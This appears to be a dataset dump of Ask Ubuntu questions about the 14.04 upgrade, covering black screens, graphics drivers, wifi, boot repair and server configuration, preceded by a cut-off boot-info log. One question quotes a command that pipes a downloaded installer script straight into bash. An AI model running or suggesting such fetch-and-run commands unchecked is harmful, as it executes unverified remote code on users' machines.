/boot/vmlinuz-3.13.0-24-generic root=uuid=6c529c8d-4150-41e0-b289-382362058948 ro quiet splash $ vt_handoff echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } menuentry 'ubuntu , with linux 3.13.0-24-generic ( recovery mode ) ' -- class ubuntu -- class gnu-linux -- class gnu -- class os $ menuentry_id_option 'gnulinux-3.13.0-24-generic-recovery-6c529c8d-4150-41e0-b289-382362058948 ' { recordfail load_video insmod gzio insmod part_gpt insmod ext2 set root='hd0 , gpt2' if [ x $ feature_platform_search_hint = xy ] ; then search -- no-floppy -- fs-uuid -- set=root -- hint-bios=hd0 , gpt2 -- hint-efi=hd0 , gpt2 -- hint-baremetal=ahci0 , gpt2 6c529c8d-4150-41e0-b289-382362058948 else search -- no-floppy -- fs-uuid -- set=root 6c529c8d-4150-41e0-b289-382362058948 fi echo 'loading linux 3.13.0-24-generic ... ' linux /boot/vmlinuz-3.13.0-24-generic root=uuid=6c529c8d-4150-41e0-b289-382362058948 ro recovery nomodeset echo 'loading initial ramdisk ... ' initrd /boot/initrd.img-3.13.0-24-generic } } # # # end /etc/grub.d/10_linux # # # # # # begin /etc/grub.d/20_linux_xen # # # # # # end /etc/grub.d/20_linux_xen # # # # # # begin /etc/grub.d/30_os-prober # # # # # # end /etc/grub.d/30_os-prober # # # # # # begin /etc/grub.d/30_uefi-firmware # # # # # # end /etc/grub.d/30_uefi-firmware # # # # # # begin /etc/grub.d/40_custom # # # # this file provides an easy way to add custom menu entries . simply type the # menu entries you want to add after this comment . be careful not to change # the 'exec tail ' line above . # # # end /etc/grub.d/40_custom # # # # # # begin /etc/grub.d/41_custom # # # if [ -f $ { config_directory } /custom.cfg ] ; then source $ { config_directory } /custom.cfg elif [ -z `` $ { config_directory } '' -a -f $ prefix/custom.cfg ] ; then source $ prefix/custom.cfg ; fi # # # end /etc/grub.d/41_custom # # # -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =============================== sda2/etc/fstab : ================================ -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > # / was on /dev/sda2 during installation uuid=6c529c8d-4150-41e0-b289-382362058948 / ext4 errors=remount-ro 0 1 # /boot/efi was on /dev/sda1 during installation # uuid=70d6-1701 /boot/efi vfat defaults 0 1 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- =================== sda2 : location of files loaded by grub : ==================== gib - gb file fragment ( s ) ======================== unknown mbrs/boot sectors/etc : ======================== unknown bootloader on sda1 00000000 eb 58 90 42 53 44 20 20 34 2e 34 00 02 01 20 00 |.x.bsd 4.4 ... .| 00000010 02 00 00 00 00 f0 00 00 20 00 10 00 00 00 00 00 | ... ... .. ... ... .| 00000020 00 40 06 00 4f 0c 00 00 00 00 00 00 02 00 00 00 | . @ ..o ... ... ... ..| 00000030 01 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| 00000040 00 01 29 01 17 d6 70 45 46 49 20 20 20 20 20 20 |.. ) ... pefi | 00000050 20 20 46 41 54 33 32 20 20 20 fa 31 c0 8e d0 bc | fat32 .1 ... .| 00000060 00 7c fb 8e d8 e8 00 00 5e 83 c6 19 bb 07 00 fc |.| ... ... ^ ... ... .| 00000070 ac 84 c0 74 06 b4 0e cd 10 eb f5 30 e4 cd 16 cd | ... t ... ... .0 ... .| 00000080 19 0d 0a 4e 6f 6e 2d 73 79 73 74 65 6d 20 64 69 | ... non-system di| 00000090 73 6b 0d 0a 50 72 65 73 73 20 61 6e 79 20 6b 65 |sk..press any ke| 000000a0 79 20 74 6f 20 72 65 62 6f 6f 74 0d 0a 00 00 00 |y to reboot ... ..| 000000b0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | ... ... ... ... ... .| * 000001f0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 aa | ... ... ... ... ..u.| 00000200 =============================== stderr messages : =============================== cat : /tmp/bootinfo-txcuiroz/tmp_log : no such file or directory
449801	after upgrading from13.10 to 14.04 screen on a laptop does n't work but	first my laptop cpu/gpu is intel celeron n2815 ( bay trail ) and i am in dual boot with windows 8 . i have upgraded from ubuntu 13.10 to 14.04 today through update manager . and after upgrading and after booting the only thing that happens is that screen does n't show ubuntu logo for booting and that at some point it turns off . also then i hear ubuntu sound when it comes to login screen . the screen does n't turn on after that . ( also i have to tell you that i tried to install ubuntu 14.04 from usb and that there was the same problem . it asked me what i want to do ( try or install ubuntu ) and it does n't matter what option i selected the result was the same . ) then i decided to try some stuf . first i tried to bootup with ubuntu with linux 3.11.0-19-generic . and it went well . the screen was working and everything was fine . then i decided to try to hook my desktops screen on laptop via hdmi and right away it worked . both screens were on and i had two screens . so i went in system settings - > displays and there saw 3 screens . built-in display , my secondary desktop display and unknown display . in 13.10 i had to turn of unknown display because all the workspaces were size of built-in display + unknown display so i did n't saw my edges . now that i know that my graphics drivers work and everything is fine , i tried default booting in ubuntu . still connected to my desktop display via hdmi it started booting and booted . but the problem was that only desktops display was working . laptops display was off . so happily i again went into display settings only to notice that i only get two displays . desktops and some other with strange unfamiliar name : chi mei optoelectronics corp. 15,6 '' ( i will add screen shots : ) ) . this other screen was on and should somewhere work but not on laptop . as far as i can remember laptops screen was always named built-in display ( in 12.04 and 13.10 ) . and i never had the same problem . so now i have some questions . what is the difference between : ubuntu with linux 3.11.0-19-generic and 3.13.0-24-generic ( i do n't know much about linux as i am new to this stuff . but i know a thing or two about computers. ) ? is this different kernels ? also i want to know if there is important difference between and if it is important which one i use to run ubuntu . of cours i want to use default one as i do n't want to wait every time to ask me . and of course i would be very grateful if anyone will take time and try to help me . thank you for your time : ) ubuntu with linux 3.11.0-19-generic : default boot : p.s . i ca n't upload images because i do n't have reputation 10 .
449803	network connection stops working after establishing bluetooth connection with a device	on ubuntu 12.04 after connecting via bluetooth to speakers ( which work and sounds goes through ) the network connection stops working . network interface is there , wireless connection is there ( full bar in top-right icon ) but packets stop going through . disconnecting from bluetooth restores network connection . any clues ? in case it helps : all this takes place on hp folio 13 .
449805	alternative to the cli command `` more ''	i have search google over and over looking for an alternative to the command more . something that uses ncurses , etc . i know that something exists as i had it on my laptop before i upgraded to 14.04 yesterday , during the upgrade for some reason it disappeared . the one i was using on my laptop had a blue bar across the bottom and allowed the use of pgup and pgdwn to go back and forth . it had already made itself default as when i asked for details during the upgrade to 14.04 it displayed those details using it instead of more . the problem is i do not know the name of this software for the life of me . i 've searched google for many terms while looking for this replacement but have n't found anything as of yet .
449806	ubuntu 14.04 boots with black screen	yesterday i was so excited to see new release . after creating live usb i was not able to boot it . i have disable uefi to legacy and selected usb as boot option to my dell laptop , and i can only see black screen after dell logo for rest of night . i have dell inspiron i7 , 16gb ram 2gb nvidia and ssd . p.s . note i can boot fedora 20 live usb with same configuration : (
449807	how do i install super boot manager ?	i have recently installed ubuntu 14.04 and i am unable to install super boot manager ? is there a solution to this issue ?
449808	ubuntu 14.04 live usb installer will not run	i 'm currently trying to update from 12.04 to 14.04 with a live usb which i made using the startup disk creator application . however , whenever i boot up with it , it takes several minutes to start up , and i receive the following error : installation failed the installer encountered an unrecoverable error . a desktop session will now be started ... i found this question which seemed similar , but i tried everything suggested there with no results . i verified the md5sum of the iso i used to make the usb image , and that checked out . removing ubiquity slideshow as suggested in one of the answers also did not help , so i re-added that . whenever i try to run ubiquity to install ubuntu 14.04 , it just hangs ( with the rotating waiting mouse icon ) and then eventually closes . i 'm trying to install on a 64-bit hp envy-15t , which is currently dual-booted with windows 8.1 and ubuntu 12.04 , and i 'm using the 64-bit ubuntu desktop iso . does anyone know a fix for this ?
449809	upgraded from 13.10 to 14.04 . still only have 13.10	upgrade from 13.10 to 14.04 last night for 6 hours . i got sleepy and told the software `` no '' to delete obsolete packages . so now after re-boot i still have 13.10 . i assume that i still have those obsolete packages . i am ubuntu gnome , btw .
449810	no wireless connection ubuntu 12.04	i have installed ubuntu 12.04 yesterday on my laptop . somehow i can not get a wireless internet connection anymore . i 'm not sure what to do . the laptop had windows xp before and everything worked just fine ( with the wireless connection ) . i searched a little bit and some people told me to use the command lspci -v. this is the output ( the last section of it which i 've been told is the important one ) : 02:00.0 ethernet controller : marvell technology group ltd. 88e8042 pci-e fast ethernet controller ( rev 10 ) subsystem : hewlett-packard company device 308c flags : bus master , fast devsel , latency 0 , irq 43 memory at 93100000 ( 64-bit , non-prefetchable ) [ size=16k ] i/o ports at 3000 [ size=256 ] capabilities : < access denied > kernel driver in use : sky2 kernel modules : sky2 i can see that the capabilities are access denied . what does that mean ? can anyone help me , please ? edit capabilities : capabilities : [ 48 ] power management version 3 capabilities : [ 5c ] msi : enable+ count=1/1 maskable- 64bit+ capabilities : [ c0 ] express legacy endpoint , msi 00 capabilities : [ 100 ] advanced error reporting capabilities : [ 130 ] device serial number 34-be-c3-ff-ff-55-26-00 edit2 : 00:00.0 host bridge : advanced micro devices , inc. [ amd ] rs780 host bridge\n 00:01.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( int gfx ) 00:04.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 0 ) 00:07.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 3 ) 00:09.0 pci bridge : advanced micro devices , inc. [ amd ] rs780/rs880 pci to pci bridge ( pcie port 4 ) 00:11.0 sata controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 sata controller [ ahci mode ] 00:12.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:12.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0 usb ohci1 controller 00:12.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:13.0 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci0 controller 00:13.1 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0 usb ohci1 controller 00:13.2 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ehci controller 00:14.0 smbus : advanced micro devices , inc. [ amd/ati ] sbx00 smbus controller ( rev 3a ) 00:14.2 audio device : advanced micro devices , inc. [ amd/ati ] sbx00 azalia ( intel hda ) 00:14.3 isa bridge : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 lpc host controller 00:14.4 pci bridge : advanced micro devices , inc. [ amd/ati ] sbx00 pci to pci bridge 00:14.5 usb controller : advanced micro devices , inc. [ amd/ati ] sb7x0/sb8x0/sb9x0 usb ohci2 controller 00:18.0 host bridge : advanced micro devices , inc. [ amd ] family 11h processor hypertransport configuration ( rev 40 ) 00:18.1 host bridge : advanced micro devices , inc. [ amd ] family 11h processor address map 00:18.2 host bridge : advanced micro devices , inc. [ amd ] family 11h processor dram controller 00:18.3 host bridge : advanced micro devices , inc. [ amd ] family 11h processor miscellaneous control 00:18.4 host bridge : advanced micro devices , inc. [ amd ] family 11h processor link control 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs780m [ mobility radeon hd 3200 ] 02:00.0 ethernet controller : marvell technology group ltd. 88e8042 pci-e fast ethernet controller ( rev 10 ) bus 002 device 002 : id 5986:03b0 acer , inc bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub sudo lspci -nn | grep 0280 06:00.0 network controller [ 0280 ] : broadcom corporation bcm4312 802.11b/g lp-phy [ 14e4:4315 ] ( rev 01 )
449816	samsung 840pro ssd in raid0 ... caveats ?	we have a supermicro x9sri-f-o board that has two 6gb/s sata3.0 ports . we currently have a single samsung 840pro ssd hooked up to the first sata channel . we want to double the storage and bandwidth by adding another 840pro to the other sata channel and striping our reads/writes with raid0 . i checked the block diagram for the motherboard , it appears the southbridge has enough bandwidth to support this setup . we 'll benchmark this to make sure , and add a controller card if necessary . first , our current ssd we do n't have discard in the fstab , we simply run trim as a daily cron job . the command is fstrim -v / 2 > & 1 | logger -t trim . will this work in a raid setup ? second , stripe size seems like a critical decision with an ssd . i 've read this should be 64kb per ssd due to erase block size ... leading me to think that 128k is the minimum correct stripe size . eh ? third , we planned to have the raid partitions use the entire ssds . i suspect we no longer have to worry about partition alignment , since any partitions ( swap ) will be on top of the virtual raid device . my other thought is there may have to be a boot partition , since it 's unlikely we 'll have raid0 support at boot . if this is the case , how do we align the boot and the main partition for this particular ssd ? answers to any of these questions or advice , caveats etc is much appreciated . thank you !
449818	ca n't find boot-repair package for the newest version of ubuntu	after upgrading ubuntu 13.10 to 14.04 , grub failed to load ubuntu and threw the error symbol 'grub_term_highlight_color ' not found . i followed the solution offered in the bug report but this failed for me , throwing the error failed to get canonical path of /cow . now , i 'm trying to install boot-repair to fix this problem on a live pen-drive , using these commands . sudo add-apt-repository ppa : yannubuntu/boot-repair sudo apt-get update sudo apt-get install -y boot-repair & & ( boot-repair & ) but after adding and updating the repositories , it shows ppa : yannubuntu/boot-repair 404 not found error . w : failed to fetch http : //ppa.launchpad.net/yannubuntu/boot-repair/ubuntu/dists/trusty/main/binary-amd64/packages 404 not found is this problem solvable or is there an alternative ppa for boot-repair ?
449819	how can i east asian language input work properly on swf played with firefox ?	i want to input cjk ( chinese , janpanese , korean ) languages on swf played with firefox . but i can input only english in it . i am using ubuntu 12.04 lts . what happen and how to solve this problem ?
449820	ubuntu 14.04 screen resolution too low ( sis 671 graphics card )	i just installed ubuntu 14.04 but my screen resolution is set too low , i tried to add a new one but i keep getting . xrandr : failed to get size of gamma for output default i tried : : ~ $ xrandr -q xrandr : failed to get size of gamma for output default screen 0 : minimum 640 x 480 , current 640 x 480 , maximum 640 x 480 default connected primary 640x480+0+0 0mm x 0mm 640x480 73.0* 1024x768_60.00 ( 0x194 ) 63.5mhz h : width 1024 start 1072 end 1176 total 1328 skew 0 clock 47.8khz v : height 768 start 771 end 775 total 798 clock 59.9hz ( i did n't have this problem on ubuntu 13.10 13.04 12.04 ) and thank you . and : : ~ $ xrandr -- newmode `` 1024x768_60.00 '' 63.50 1024 1072 1176 1328 768 771 775 798 -hsync +vsync xrandr : failed to get size of gamma for output default : ~ $ lspci | grep vga 01:00.0 vga compatible controller : silicon integrated systems [ sis ] 771/671 pcie vga display adapter ( rev 10 ) ============================================================================ i do n't know what happened but i did an update yesterday on my ubuntu 12.04 and it ruined my screen resolution due to something about 1204_hwe_eol now i 'm back to ubuntu 14.04 and the only way to get a nice screen resolution us to start from the recovery menu then resume boot
449822	ppa spring cleaning -- - list packages installed from a ppa ?	this is a q & a-style thing -- - hoping to help you in this period of new lts release ( s ) . there are a lot of links in this post , follow them and upvote them to give the authors the relevant kudos . it is often suggested to remove or purge all of your ppas when doing a version upgrade ; i often have a lot of troubles remembering which ppa are installed and which packages are `` owned '' by a particular ppa -- - you sometime install a ppa but that does not mean that you have installed all packages from it . for the list of ppa there are quite a lot of good scripts around ; and for discovering the packages really installed from a ppa you can use apt-cache policy or similar commands . but -- - what about a one-stop script to list all your installed ppas and all the packages you have installed from them ?
449824	ca n't run vidalia due to an apparmor policy error	i installed vidalia , and added a user to debian-tor group . but when i run it , it gets me error : $ vidalia ( process:5691 ) : gconf-warning ** : client failed to connect to the d-bus daemon : an apparmor policy prevents this sender from sending this message to this recipient , 0 matched rules ; type= '' method_call '' , sender= '' ( null ) '' ( inactive ) interface= '' org.freedesktop.dbus '' member= '' hello '' error name= '' ( unset ) '' requested_reply= '' 0 '' destination= '' org.freedesktop.dbus '' ( bus ) ( < unknown > :5691 ) : glib-gio-error ** : no gsettings schemas are installed on the system trace/breakpoint trap ( core dumped ) how can i solve it ?
449827	create x11vnc password file with both admin and viewonly password on 12.0.4lts	using ubuntu 12.0.4 lts and need to enable x11vnc access with admin and viewonly access based on which vnc password is supplied . the x11vnc server gets started out of /etc/lightdm/start via : /usr/bin/x11vnc -forever -rfbauth ~/.vnc/x11vnc.pass -o ~/.vnc/x11vnc.log -display :0 i can create the password file and set a full access password via $ x11vnc -storepasswd 'test1pwd ' ~/.vnc/x11vnc.pass stored passwd in file : /home/rxclient/.vnc/x11vnc.pass using vncviewer from another system , the login works $ vncviewer wks13 connected to rfb server , using protocol version 3.8 performing standard vnc authentication password : < test1pwd > authentication successful desktop name `` wks13:0 '' no matter what i 've tried , i can not get a second , viewonly passwd to work using the -rfbauth on the server . the only thing that worked was to create a clear-text file with two passwords and changing the -rfbauth to -passwdfile . with -rfbauth , the full access password works , the viewonly passwd results in a password check failed message . would appreciate instructions/clarification on how to set up x11vnc to use -rfbauth and two non-cleartext passwords , one for full access , one for viewonly .
449830	hdmi audio crackling only in google chrome	i just installed ubuntu 14.04 64bit and it 's awesome . i use an hdmi cable : video and audio work flawlessly , except on chrome 64bit ( not chromium ) . unfortunately , the audio crackles a lot . this happens both with flash videos as well as html 5 ones , so i guess it 's not pepper related . any suggestion ? ubuntu runs on a machine with amd apu e-450 with open drivers . thank you guys ! : d
449831	recovering files from old xp using dsl , trouble xfering says hdd has no space left when it is fresh format	i 'm not 100 % this is the right place to ask , apologies if i am in the wrong place . i have an old win xp tower that i 'm supposed to fix from 1999 for my grandpa . he got some nasty viruses on it and we can not bypass the password ( he got one of those `` your computer appears to have been hacked '' phone calls and let them onto hix box ) they locked the admin as well , and we ca n't find syskey ( a couple people have tried this before i was asked to fix it ) . so i figure the best thing to do would be to just back up all of his documents to an external hdd , and give him a fresh install ( unless someone has a better idea ) . anyways his tower wo n't let me boot from usb for some reason ( i 've tried everything i know of to get it to and it just wo n't ) , so i created a damn small linux cd to boot live , since apparently ubuntu is now too big to fit onto a cd ( i swear i have a v10 floating around somewhere , just ca n't find it sadly ) . from googling it seems lots of people have done exactly what i want to do , so it is more than capable of transferring files to an external from a xp partition . as i am a newb when it comes to this stuff i learned i ca n't use ntfs with dsl , so i used the bootable usb on a laptop and partitioned it as fat , which finally allowed me read/write access ( it would read-only as ntfs just would n't let me write ) . so now my question is , the external is a formatted , wiped clean . when i try to copy documents over to the external it copies a few files and throws a `` no space left on device '' error . it copied 2.9mb of data before throwing the error . odd because it a 160gb hdd ... any help would be appreciated . is it a problem with dsl , do i need to install dsl/ubuntu onto the box itself and try it that way maybe ? i do n't know if the computer would even run ubuntu ... it 's a 500mhz processor with 640mb of ram ...
449832	hp recovery discs to re-install windows 8 and remove ubuntu ?	so i really need to go back to windows 8 because i cant play any of my steam games and so on . can i use my hp recovery discs to factory reset ( erase hard drive ) and will it re-install windows and remove ubuntu or no ? specs : hp pavilion g6 4gb ram amd radeon hd series
449833	14.04 headphones do not appear as an output device	i installed 14.04 yesterday . i always leave my headphones and speakers plugged in together , so i know i have them in the right ports . sound came though the speakers just fine , but nothing came through the headphones . after opening system settings > > sound , i found only two output devices listed : digital output ( s/pdif ) and analog output . selecting analog output goes through the speakers , and the other option does not give me any sound . when i had windows 7 installed i used the realtek audio manager . i do n't know if that has something to do with it . any help would be appreciated . i am new to ubuntu so i probably just did something stupid . thanks . **headphones work when plugged into the port that the speakers were using .
449834	âserious errors while checking the disk drives for /bootâ error while booting	when i try to install ubuntu 14.04 i get this error after installing the system and trying to boot for the first time . i saw this article i get a `` serious errors while checking the disk drives for /boot '' error while booting but , it does not helped me . i can not boot ubuntu . i 'm installing it into my windows 8.1 . no matter witch option i choose ( ( i to ignore , s to skip mounting or m for manual recovery ) ) , can not boot . any solution to this ?
449838	how can i install takeoff launcher on ubuntu gnome	recently i 've installed phaneton dock on my ubuntu gnome and now i want to install takeoff launcher to make it look like os x . thanks for help ! ! ! .
449839	ibus-unikey , i cant transfor between english and vietnamese on ubuntu 14.04	i have a trouble with ibus-unikey , i installed it for ubuntu 12.04 and it worked correctly . i can transform between english and vietnamese . but when i upgrade my os up ubuntu 14.04 i cant transform between english and vietnamese . it always in vietnamese and so i cant type my password in the terminal . i do n't know how to use ibus-unikey in 14.04 . it is different from ubuntu 12.04 . please help me if you know about it !
449842	opengl version problem on mesa	i 'm running ubuntu 14.04 lts on vmware fusion 6 on my macbook pro retina ( which supports opengl upto version 4.1 ) i have installed mesa by using following command sudo apt-get install mesa-utils but now when i run the following command for checking version glxinfo | grep `` opengl version '' it shows me opengl version string : 2.1 mesa 10.1.0 mesa 10.1 support opengl 3.3 on ubuntu 14.04 lts , but why i 'm getting still 2.1 ?
449843	weird ubuntu 14.04 post-install issues	firstly , thank you for the help last night with the catastrophe that ruined my 12.04 to 14.04 lts upgrade . i 'm now comfortably running 14.04 with all my data back and all is well in the world . i 'm just having some really weird post install issues with 14.04 that i 'm having trouble finding information on : 1 . ) reboot from terminal is not functional - as in the command `` sudo reboot now '' . i had to add the reboot=pci flag to /etc/default/grub and run sudo grub-update to make regular reboot work , but reboot now currently hangs on a black screen , and when i press the power button , shuts down the computer , not restarts it . it 's not that big of a deal but it 's still weird . 2 . ) when i launch gparted , it hangs on `` searching /dev/sda partitions ... '' forever . this was previously working on 12.04 and i would like it to work on 14.04 . i have tried uninstalling and re-installing it . thanks !
449844	unable to setup jekyll in ubuntu ?	after upgrading to 14.04 , ruby was downgraded to 1.8.3 so i tried to upgrade using the following commands . sudo apt-get install libgdbm-dev libncurses5-dev automake libtool bison libffi-dev curl -l https : //get.rvm.io | bash -s stable source ~/.rvm/scripts/rvm echo `` source ~/.rvm/scripts/rvm '' > > ~/.bashrc rvm install 2.1.1 rvm use 2.1.1 -- default ruby -v after that i ran sudo gem install jekyll it was installed sucessfully but , i am not able to use it is says bash : /usr/local/bin/jekyll : /usr/bin/ruby1.9.1 : bad interpreter : no such file or directory
449845	problems after upgrading to 14.04 ( only background and pointer after login )	after upgrading from 12.04 to 14.04 i could log in to my x session ( albeit with really low graphics ) . while trying to fix the graphics , i managed to break the x session . now , after typing my password in the unity-greeter , the items disappear and i can only see the desktop background and the pointer . this happens for every user . i can still log in in tty 's . how can i solve this ? also , i can not seem to be able to install nvidia-current as it tries to install nvidia-304 and it depends on old video-abi libraries . is there a way to tell the package manager that nvidia-current should use a newer version ?
449847	can not upgrade from kubuntu 13.10 to 14.04	the upgrade tool start . when finished `` setting new software channels '' give me an error : `` could not calculate the upgrade '' . any ideas ? thx
449849	wn3100 wifi dongle will not work with wpa2 broadcom ( bcm43231 )	i can not get my wireless dongle to work at all with wpa2 encryption . i noticed some people mentioned my same model works with wpa2 . it works if i connect via wep but that reduces my speed by a lot . wpa2 comes back as invalid password even though its correct . bus 002 device 005 : id 0846:9020 netgear , inc. wna3100 ( v1 ) wireless-n 300 [ broadcom bcm43231 ] i followed this guide to enable my dongle to get detected and installed the proper drivers as well . could anyone help me get my netgear wna3100 ( broadcom bcm43231 ) wireless adapter to work ?
449850	will linux operating system read a disc that requires another operating system ?	i have a pc dvd/rom with a game on it that i want to install on my linux operating system computer . when i insert the disc it says dvd was mounted automatically and some files pop up . when i inserted the disk on another computer ( using windows ) is asked me if i want to install the game . on linux it dose not let me install the game .
449851	how do i remove the shortcut buttons/toolbar from emacs ?	after upgrading from ubuntu 13 - > 14.04 emacs now wastes valuable screen space with silly buttons . how can i go back to a `` buttonless '' version of emacs ?
449853	after upgrading from 13.10 to 14.04 lts intel drivers not loading only gallium 0.4	so this morning i was informed of the 14.04 lts release and asked if i wanted to upgrade . i performed the upgrade process and all went fine , but when i checked the video drivers after the upgrade was complete i saw `` gallium 0.4 on llvmpipe ( llvm 3.4 , 256 bits ) '' instead of the normal `` intel sandybridge mobile '' . naturally of course the xorg website shows that the linux-intel-grphics-installer is not yet updated for the 14.04 release . is there any way for me to get my proper drivers working , or am i stuck waiting until intel decides to release the updated installer ? it took them months for the 13.10 release , so i 'm hoping for something faster . update : looks like the problem is that when the xserver starts up it attempts to load the intel module but that fails so it reverts back to the gallium . from my xorg.0.log [ 25.073 ] loading extension glx [ 25.073 ] ( ii ) loadmodule : `` intel '' [ 25.073 ] ( ww ) warning , could n't open module intel [ 25.073 ] ( ii ) unloadmodule : `` intel '' [ 25.073 ] ( ii ) unloading intel [ 25.073 ] ( ee ) failed to load module `` intel '' ( module does not exist , 0 ) [ 25.073 ] ( == ) matched intel as autoconfigured driver 0 [ 25.073 ] ( == ) matched intel as autoconfigured driver 1 [ 25.073 ] ( == ) matched modesetting as autoconfigured driver 2 [ 25.073 ] ( == ) matched fbdev as autoconfigured driver 3 [ 25.073 ] ( == ) matched vesa as autoconfigured driver 4 [ 25.073 ] ( == ) assigned the driver to the xf86configlayout [ 25.073 ] ( ii ) loadmodule : `` intel '' [ 25.074 ] ( ww ) warning , could n't open module intel [ 25.074 ] ( ii ) unloadmodule : `` intel '' [ 25.074 ] ( ii ) unloading intel [ 25.074 ] ( ee ) failed to load module `` intel '' ( module does not exist , 0 ) so if anyone can give me a hint as to why xserver ca n't load this , or why it says it does n't exist that would be nice . i was led to believe that there are intel drivers in the actual ubuntu releases .
449854	if i install ubuntu from cd/usb am i able to return default windows bootscreen if for some reason i want to unistall ubuntu ?	as title says . am i able to go back to default windows 8 boot screen ? do i need windows 8 dvd for it ?
449855	touchpad after upgrading to 14.04	so after i put the 14.04 on my laptop yesterday , my touchpad is now not able to scroll horizontally anymore . before it was working out of the box for me but now i can only scroll vertically . i am using a lenovo u310 ideapad . what could be the problem here ? i can provide any more info if required .
449857	apache serving wrong virtualhost instead of the proper virtualhost when accessed	right so i have a few virtualhosts running on my server ( named ones ) and for some reason ( even though it was working fine yesterday ) one of my vhosts is redirecting to another vhost on the server . < virtualhost www.example.com > documentroot `` /var/www/example '' < directory `` /var/www/example '' > allow from all options +indexes allowoverride all < /directory > serveralias example.com servername www.example.com alias /phpmyadmin /usr/share/phpmyadmin < /virtualhost > < virtualhost www.example2.com > documentroot `` /var/www/example2 '' < directory `` /var/www/example2 '' > allow from all options +indexes allowoverride all < /directory > serveralias example2.com servername www.example2.com < /virtualhost > so when i visit example.com , example2.com appears . i 've looked at the error logs but there 's nothing to explain it there , i also looked at the access logs and it shows a 304 redirect .
449859	low resolution on radeon hd 4530 ubuntu 12.04.04	i 've just install ubuntu and i ca n't solve the problem with low graphic settings . it is n't ugly low but it still not good enough . i did this instruction but it did n't work for me . what should i do to improve resolution ? i have no idea what to do . i have ubuntu 12.04.04 and rv710/m92 [ mobility radeon hd 4530/4570/545v ] i 'm ready to install older ubuntu only to improve graphic if it would work . the displays settings shows that is 1366*768 but i 'm not sure about that it seems much lower . i used xrandr but it did n't help too .
449865	can not login to ubuntu 14.04	i upgraded my hp g6 from ubuntu 13.10 to 14.04 yesterday . now i can not log into the system using ubuntu/unity but i can still login using i3 windows manager . i checked and found the ubuntu-desktop is broken . i tried to reinstall it , it complained about the dependency issue and broken package . some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : ubuntu-desktop : depends : ubuntu-session but it is not going to be installed recommends : empathy but it is not going to be installed e : unable to correct problems , you have held broken packages . when i tried to install ubuntu-session , some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : ubuntu-session : depends : gnome-session-bin ( < 3.10 ) but 3.10.1-0ubuntu1~saucy1 is to be installed depends : gnome-session-common ( = 3.9.90-0ubuntu12 ) but 3.10.1-0ubuntu1~saucy1 is to be installed e : unable to correct problems , you have held broken packages . i tried sudo apt-get install -f but it does not work any help would be highly appreciated . thanks .
449867	update to 14.04 results in booting to a black screen	yesterday i updated to 14.04 from 13.10 using the update-manager -d. and after it installed and asked to reboot , it rebooted to a black screen . i really do n't know what to do here . my other machine updated without any issues .
449868	persistent memory	i was reading this guide to installing ubuntu on a flash drive to see if there are any new ways of making a persistent boot , but i had a couple of questions . i like this method bc i can have several operating systems plus my files on a drive , and do n't have to dedicate a whole drive to an os . is there a way to introduce a persistent memory onto this ? the other question i have is , if i do the unetbootin method , usb-creator , or pen drive linux , am i able to update my flash drive os and keep it updated or will i have to get updates every time ?
449870	using gui ( nautilus , say ) to copy root files while preserving permissions	using a gui , i would like to copy a folder hierarchy in which some files belong to a user , some to root , producing an exact copy ( same file permissions in target ) . using gksudo nautilus allows to copy root-owned files , but changes permissions to root root ( at least when test running it on my system , 12.04. ) . how can the above be done ?
